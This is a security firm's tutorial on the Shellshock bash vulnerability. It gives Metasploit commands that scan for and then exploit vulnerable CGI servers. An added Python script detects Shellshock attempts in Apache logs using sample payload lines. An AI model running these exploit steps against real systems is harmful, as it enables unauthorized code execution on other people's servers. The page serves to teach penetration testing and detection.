
    SHELLSHOCK

    TROJAN HORSE SECURITY IS TEACHING THESE CONCEPTS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT CONDONE ILLEGAL HACKING. TROJAN HORSE SECURITY CONSULTANTS ARE HIRED AS ETHICAL HACKERS AT THE REQUEST OF ORGANIZATIONS WITH PERMISSION TO HACK THEIR NETWORKS AND SYSTEMS.

     

     

    Shellshock was another of those vulnerabilities that had a major impact across the IT industry. Some called it Heartbleed 2.0.

     

    There are already many Metasploit modules available for Shellshock, including:

     

    > auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
    > auxiliary/server/dhclient_bash_env.rb
    > exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
    > exploits/osx/local/vmware_bash_function_root.rb

     

     

    Let's try one. Start by launching Metasploit. Remember to start the database service!

     

    # service postgresql start

    /opt/metasploit/app# ./msfconsole

     

    Once launched, use the following commands to scan for vulnerable systems:

     

    msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env

    msf auxiliary(apache_mod_cgi_bash_env) > set RHOSTS <TARGETS>

    RHOSTS=> <TARGETS>

    msf auxiliary(apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/printenv.cgi
    TARGETURI=> /cgi-bin/printenv.cgi

    msf auxiliary(apache_mod_cgi_bash_env) > run

     

    Once a vulnerable system is discovered, it can be exploited using the following module:

     

    msf > use exploits/multi/http/apache_mod_cgi_bash_env_exec

    msf exploit(apache_mod_cgi_bash_env_exec) > set RHOST 192.168.1.1
    RHOST=> 192.168.1.1

    msf exploit(apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/printenv.cgi
    TARGETURI=> /cgi-bin/printenv.cgi

    msf exploit(apache_mod_cgi_bash_env_exec) > run

     

    There are many ways to exploit this vulnerability. Try out a few different ways and see for yourself why it is so dangerous.
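Seen from the defender's side, requests like the ones these modules send leave a trace: mod_cgi copies request headers into environment variables, and a Shellshock attempt puts a bash function definition (`() {`) in one of them. The following is an added example, not part of the original page, that flags such requests in an Apache access log; the combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re

# Apache "combined" format (assumed):
# host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ '
    + QUOTED + ' ' + QUOTED + r'$'
)

# Bash function-definition marker: "()" followed by "{", whitespace optional.
FUNC_DEF = re.compile(r'\(\)\s*\{')

def find_shellshock_probes(lines):
    """Return one dict per log line whose request, Referer or User-Agent
    carries a bash function definition."""
    hits = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not combined format: skip rather than guess
        host, when, request, status, referer, agent = m.groups()
        fields = {"request": request, "referer": referer, "agent": agent}
        for name, value in fields.items():
            if FUNC_DEF.search(value):
                hits.append({
                    "host": host, "time": when, "field": name,
                    "request": request,
                    # A non-error status means the script was actually
                    # invoked, so the host needs a closer look.
                    "served": int(status) < 400,
                })
                break
    return hits

# Constructed sample log lines (documentation IP ranges, commands elided).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2020:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2020:10:01:05 +0000] "GET /cgi-bin/printenv.cgi HTTP/1.1" 200 1024 "-" "() { :; }; <command elided>"',
    '198.51.100.7 - - [10/Oct/2020:10:01:06 +0000] "GET /cgi-bin/missing.cgi HTTP/1.1" 404 209 "() { x; }; <command elided>" "curl/7.30"',
    '192.0.2.33 - - [10/Oct/2020:10:02:00 +0000] "GET /docs/func() HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(hit["host"], hit["time"], hit["field"], hit["request"],
              "SERVED" if hit["served"] else "rejected")
```

The combined format only records the Referer and User-Agent headers, so an attempt carried in another header (a cookie, for example) will not show up unless that header is added to the `LogFormat`.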

    © 2020  TROJAN HORSE SECURITY INC
